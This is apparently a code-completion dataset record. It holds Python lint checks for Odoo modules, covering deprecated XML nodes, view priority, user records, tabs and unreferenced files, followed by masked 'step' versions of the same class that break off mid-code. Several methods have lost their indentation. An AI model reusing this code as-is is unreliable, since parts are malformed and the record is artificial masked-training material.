except (IndexError, ValueError):
# IndexError: If the field is not found
# ValueError: If the value found is not valid integer
pass
return 0
@staticmethod
def _is_replaced_field(view):
try:
arch = view.xpath("field[@name='arch' and @type='xml'][1]")[0]
except IndexError:
return None
replaces = \
arch.xpath(".//field[@name='name' and @position='replace'][1]") + \
arch.xpath(".//xpath[@position='replace'][1]")
return bool(replaces)
def _check_dangerous_view_replace_wo_priority(self):
"""Check dangerous view defined with low priority
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
xml_files = self.filter_files_ext('xml')
for xml_file in xml_files:
views = self.get_xml_records(
os.path.join(self.module_path, xml_file), model='ir.ui.view')
for view in views:
priority = self._get_priority(view)
is_replaced_field = self._is_replaced_field(view)
if is_replaced_field and priority < self.config.min_priority:
self.msg_args.append((
"%s:%s" % (xml_file, view.sourceline), priority,
self.config.min_priority))
if self.msg_args:
return False
return True
    def _check_create_user_wo_reset_password(self):
        """Check xml records of user without the context
        'context="{'no_reset_password': True}"'
        This context avoid send email and mail log warning
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        self.msg_args = []
        xml_files = self.filter_files_ext('xml')
        for xml_file in xml_files:
            user_records = self.get_xml_records(
                os.path.join(self.module_path, xml_file), model='res.users')
            # if exists field="name" then is a new record
            # then should be context
            # Records without a name field only modify existing users
            # and are therefore skipped.
            self.msg_args.extend([
                ("%s:%s" % (xml_file, user_record.sourceline))
                for user_record in user_records
                if user_record.xpath("field[@name='name']") and
                'no_reset_password' not in (user_record.get('context') or '')])
        if self.msg_args:
            return False
        return True
def _check_javascript_lint(self):
"""Check javascript lint
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for js_file_rel in self.filter_files_ext('js', relpath=True):
js_file = os.path.join(self.module_path, js_file_rel)
errors = self.check_js_lint(js_file, self.config.jslintrc)
for error in errors:
self.msg_args.append((js_file_rel + error,))
if self.msg_args:
return False
return True
    def _check_deprecated_data_xml_node(self):
        """Check deprecated <data> xml node inside <odoo> xml node
        :return: False if found <data> xml node inside <odoo> xml node"""
        xml_files = self.filter_files_ext('xml')
        self.msg_args = []
        for xml_file in xml_files:
            doc = self.parse_xml(os.path.join(self.module_path, xml_file))
            # parse_xml returns a string on syntax error: skip then.
            odoo_nodes = doc.xpath("/odoo") \
                if not isinstance(doc, string_types) else []
            children, data_node = ((odoo_nodes[0].getchildren(),
                                    odoo_nodes[0].findall('data'))
                                   if odoo_nodes else ([], []))
            # A lone <data> child is redundant: its attributes could
            # live on the <odoo> node directly.
            if len(children) == 1 and len(data_node) == 1:
                lineno = odoo_nodes[0].sourceline
                self.msg_args.append(("%s:%s" % (xml_file, lineno)))
        if self.msg_args:
            return False
        return True
def _check_deprecated_openerp_xml_node(self):
"""Check deprecated <openerp> xml node
:return: False if exists <openerp> node and
add list of xml files in self.msg_args
"""
xml_files = self.filter_files_ext('xml')
self.msg_args = []
for xml_file in xml_files:
doc = self.parse_xml(os.path.join(self.module_path, xml_file))
openerp_nodes = doc.xpath("/openerp") \
if not isinstance(doc, string_types) else []
if openerp_nodes:
lineno = openerp_nodes[0].sourceline
self.msg_args.append(("%s:%s" % (xml_file, lineno)))
if self.msg_args:
return False
return True
def _check_wrong_tabs_instead_of_spaces(self):
"""Check wrong tabs character instead of four spaces.
:return: False if exists errors and
add list of errors in self.msg_args
"""
self.msg_args = []
for type_file in self.config.extfiles_to_lint:
for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
ext_file = os.path.join(self.module_path, ext_file_rel)
countline = 0
with open(ext_file, 'rb') as fp:
for line in fp:
countline += 1
line_space_trip = line.lstrip(b' ')
if line_space_trip != line_space_trip.lstrip(b'\t'):
self.msg_args.append(
("%s:%d" % (ext_file_rel, countline)))
if self.msg_args:
return False
return True
    def _check_missing_newline_extrafiles(self):
        """Check missing newline in other ext files (.xml, .csv, .po)
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        self.msg_args = []
        for type_file in self.config.extfiles_to_lint:
            for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
                ext_file = os.path.join(self.module_path, ext_file_rel)
                last_line = ''
                # NOTE: SEEK_END just is supported with 'rb' mode for py3
                with open(ext_file, 'rb') as fp:
                    # Files of 0 or 1 byte are skipped: seeking to -2
                    # from the end would fail on them.
                    if os.stat(ext_file).st_size > 1:
                        fp.seek(-2, os.SEEK_END)
                        last_line = fp.readline()
                        if not (last_line.endswith(b'\n') or
                                last_line.endswith(b'\r')):
                            self.msg_args.append((ext_file_rel,))
        if self.msg_args:
            return False
        return True
def _get_manifest_referenced_files(self):
referenced_files = {}
for data_type in DFTL_MANIFEST_DATA_KEYS:
for fname in self.manifest_dict.get(data_type) or []:
referenced_files[fname] = data_type
return referenced_files
def _get_xml_referenced_files(self):
referenced_files = {}
for data_type in DFTL_MANIFEST_DATA_KEYS:
for fname in self.manifest_dict.get(data_type) or []:
if not fname.endswith('.xml'):
continue
referenced_files.update(
self._get_xml_referenced_files_report(fname, data_type)
)
return referenced_files
    def _get_xml_referenced_files_report(self, fname, data_type):
        """Map report template files referenced by ``<report xml=...>``
        or ``<report xsl=...>`` nodes of ``fname`` to ``data_type``.

        The attribute paths start with the addon directory itself, so
        the first path component is stripped to keep them relative to
        the module root.
        """
        return {
            # those files are relative to the addon path
            os.path.join(
                *record.attrib[attribute].split(os.sep)[1:]
            ): data_type
            for attribute in ['xml', 'xsl']
            for record in self.parse_xml(
                os.path.join(self.module_path, fname)
            )
            .xpath('//report[@%s]' % attribute)
        }
def _get_module_files(self):
module_files = []
for type_file in self.config.extfiles_convert:
for ext_file_rel in self.filter_files_ext(type_file, relpath=True):
module_files.append(ext_file_rel)
return module_files
def _check_file_not_used(self):
"""Check if a file is not used from manifest"""
module_files = set(self._get_module_files())
referenced_files = set(self._get_manifest_referenced_files()).union(
set(self._get_xml_referenced_files())
)
excluded_dirs = ['static', 'test', 'tests', 'migrations']
no_referenced_files = [
f for f in (module_files - referenced_files)
if f.split(os.path.sep)[0] not in excluded_dirs
]
self.msg_args = no_referenced_files
return not no_referenced_files
    def _check_xml_attribute_translatable(self):
        """The xml attribute is missing the translation="off" tag
        Example <attribute name="groups">sale.group</attribute>
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        # Only relevant when linting exclusively for odoo 8.0.
        if (self.linter._all_options['valid_odoo_versions'].config
                .valid_odoo_versions != ['8.0']):
            return True
        self.msg_args = []
        for xml_file in self.filter_files_ext('xml', relpath=True):
            # Match <attribute> nodes that neither set name="string"
            # nor carry an explicit translation attribute.
            for record in self.get_xml_records(
                    os.path.join(self.module_path, xml_file), None,
                    '//attribute[not(@name="string") and not(@translation)]'):
                self.msg_args.append(
                    ("%s:%d" % (xml_file, record.sourceline), 'xml_id'))
        if self.msg_args:
            return False
        return True
    def _check_xml_deprecated_tree_attribute(self):
        """The tree-view declaration is using a deprecated attribute.
        Example <tree string="Partners"></tree>
        :return: False if exists errors and
                 add list of errors in self.msg_args
        """
        # Each entry: the deprecated attribute, the odoo versions where
        # it is still valid, and the xpath that detects its use.
        checks = [
            {
                'attr': 'colors',
                'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},
                'xpath': './/tree[@colors]',
            },
            {
                'attr': 'fonts',
                'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},
                'xpath': './/tree[@fonts]',
            },
            {
                'attr': 'string',
                'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'},
                'xpath': './/tree[@string]',
            },
        ]
        valid_versions = set(
            self.linter._all_options['valid_odoo_versions'].config
            .valid_odoo_versions)
        # A check applies when the attribute is configured as deprecated
        # and at least one target version is past its skip range.
        applicable_checks = [check for check in checks if (
            check['attr'] in self.config.deprecated_tree_attributes and
            bool(valid_versions - check['skip_versions']))]
        self.msg_args = []
        for xml_file in self.filter_files_ext('xml', relpath=True):
            for record in self.get_xml_records(
                    os.path.join(self.module_path, xml_file),
                    model='ir.ui.view'):
                for check in applicable_checks:
                    if record.xpath(check['xpath']):
                        self.msg_args.append((
                            '%s:%d' % (xml_file, record.sourceline),
                            check['attr']))
        if self.msg_args:
            return False
        return True
def _check_xml_deprecated_qweb_directive(self):
"""Check for use of deprecated QWeb directives t-*-options.
:return: False if deprecated directives are found, in which case
self.msg_args will contain the error messages.
"""
valid_versions = set(self.linter._all_options[
'valid_odoo_versions'].config.valid_odoo_versions)
if not valid_versions & {'10.0', '11.0'}:
return True
deprecated_directives = {
't-esc-options',
't-field-options',
't-raw-options',
}
directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)
xpath = '|'.join(
'/%s//template//*[%s]' % (tag, directive_attrs)
for tag in ('odoo', 'openerp')
)
self.msg_args = []
for xml_file in self.filter_files_ext('xml', relpath=False):
doc = self.parse_xml(xml_file)
if isinstance(doc, string_types):
continue
for node in doc.xpath(xpath):
# Find which directive was used exactly.
directive = next(
iter(set(node.attrib) & deprecated_directives))
self.msg_args.append((
'%s:%d' % (xml_file, node.sourceline), directive))
return not bool(self.msg_args)
|
normal
|
{
"blob_id": "9f34f94422f4847859e9111f34ade2e1274cb543",
"index": 8775,
"step-1": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def 
check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n <mask token>\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n <mask token>\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown 
directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n <mask token>\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n 
self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n 
:return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in 
(self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n <mask token>\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n <mask token>\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in 
self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def 
check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n <mask token>\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n <mask token>\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown 
directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. 
{record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n <mask token>\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user 
assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for 
xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, 
